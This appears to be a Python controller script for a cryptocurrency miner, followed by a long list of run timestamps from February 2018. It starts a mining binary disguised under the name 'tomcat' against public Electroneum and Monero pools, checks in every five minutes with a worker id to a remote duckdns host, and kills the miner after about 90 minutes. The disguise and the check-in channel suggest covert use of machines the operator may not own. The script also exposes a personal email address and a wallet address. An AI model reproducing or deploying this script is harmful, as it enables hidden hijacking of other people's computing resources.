import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:01.362586
#2018-02-17 17:36:03.863023
#2018-02-17 19:23:07.037953
#2018-02-17 21:14:03.625028
#2018-02-17 22:57:06.433727
#2018-02-18 00:42:05.446780
#2018-02-18 02:31:07.436397
#2018-02-18 04:18:06.369106
#2018-02-18 06:09:06.577998
#2018-02-18 07:58:07.753931
#2018-02-18 09:46:07.079238
#2018-02-18 11:32:07.774527
#2018-02-18 13:17:03.553772
#2018-02-18 15:07:01.769255
#2018-02-18 16:54:01.296208
#2018-02-18 18:42:07.410357
#2018-02-18 20:30:08.364668
#2018-02-18 22:16:03.390387
#2018-02-19 00:05:06.773171
#2018-02-19 01:51:04.938302
#2018-02-19 03:38:06.244324
#2018-02-19 05:23:04.843970
#2018-02-19 07:11:05.586251
#2018-02-19 08:59:06.700268
#2018-02-19 10:48:09.058832
#2018-02-19 12:37:05.996942
#2018-02-19 14:24:05.745731
#2018-02-19 16:12:07.665886
#2018-02-19 18:00:09.403024
#2018-02-19 19:46:07.379231
#2018-02-19 21:34:05.501461
#2018-02-19 23:20:02.984955
#2018-02-20 01:06:07.463419
#2018-02-20 02:54:04.266097
#2018-02-20 04:42:07.081947
#2018-02-20 06:26:05.684183
#2018-02-20 08:11:05.430993
#2018-02-20 09:56:04.909106
#2018-02-20 11:39:04.598790
#2018-02-20 13:26:07.508429
#2018-02-20 15:10:07.646311
#2018-02-20 16:54:02.031949
#2018-02-20 18:42:06.170409
#2018-02-20 20:32:07.890467
#2018-02-20 22:16:07.729037
#2018-02-20 23:58:07.961976
#2018-02-21 01:44:08.033569
#2018-02-21 03:33:04.793988
#2018-02-21 05:21:07.387498
#2018-02-21 07:08:04.827922
#2018-02-21 08:54:04.139976
#2018-02-21 10:41:05.219850
#2018-02-21 12:28:05.315253
#2018-02-21 14:14:09.113803
#2018-02-21 16:05:01.427727
#2018-02-21 17:56:05.487910
#2018-02-21 19:42:06.036774
#2018-02-21 21:29:06.664547
#2018-02-21 23:16:04.885191
#2018-02-22 01:07:06.463669
#2018-02-22 02:54:05.953244
#2018-02-22 04:41:04.252205
#2018-02-22 06:26:06.833024
#2018-02-22 08:13:04.134391
#2018-02-22 10:02:01.687561
#2018-02-22 11:47:10.741722
#2018-02-22 13:32:08.293170
#2018-02-22 15:21:05.883809
#2018-02-22 17:06:08.298745
#2018-02-22 18:53:07.229707
#2018-02-22 20:44:03.840282
#2018-02-22 22:31:05.345523
#2018-02-23 00:17:01.492601
#2018-02-23 02:06:05.558963
#2018-02-23 03:55:08.664880
#2018-02-23 05:31:05.066937
#2018-02-23 07:16:04.723161
#2018-02-23 09:21:06.980588
#2018-02-23 11:27:04.293781
#2018-02-23 13:18:06.128450
#2018-02-23 15:03:04.507555
#2018-02-23 16:53:05.639383
#2018-02-23 18:41:05.063542
#2018-02-23 20:27:06.467116
#2018-02-23 22:14:06.425695
#2018-02-24 00:00:08.834559
#2018-02-24 01:49:07.467601
#2018-02-24 03:42:02.175375
#2018-02-24 05:26:06.197140
#2018-02-24 07:13:04.259494
#2018-02-24 09:03:06.450129
#2018-02-24 11:02:06.727719
#2018-02-24 12:51:06.663666
#2018-02-24 14:39:04.226179
#2018-02-24 16:28:05.475464
#2018-02-24 18:19:05.309207
#2018-02-24 20:05:08.832818
#2018-02-24 21:48:06.804978
#2018-02-25 00:49:06.426439
#2018-02-25 04:47:06.266746
#2018-02-25 09:06:02.094154